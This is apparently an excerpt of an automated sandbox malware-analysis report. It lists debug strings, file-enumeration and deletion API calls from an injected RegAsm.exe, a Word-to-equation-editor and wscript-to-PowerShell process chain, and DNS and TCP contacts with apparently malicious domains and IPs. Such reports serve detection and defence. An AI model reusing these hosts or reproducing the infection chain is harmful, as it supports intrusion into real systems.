                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00407877 FindFirstFileW,FindNextFileW,13_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0044E8F9 FindFirstFileExA,13_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_10006580 FindFirstFileExA,13_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global traffic DNS query: name: og1.in
                  Source: global traffic DNS query: name: og1.in
                  Source: global traffic DNS query: name: og1.in
                  Source: global traffic DNS query: name: og1.in
                  Source: global traffic DNS query: name: og1.in
                  Source: global traffic DNS query: name: og1.in
                  Source: global traffic DNS query: name: og1.in
                  Source: global traffic DNS query: name: raw.githubusercontent.com
                  Source: global traffic DNS query: name: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                  Source: global traffic DNS query: name: geoplugin.net
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49173 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
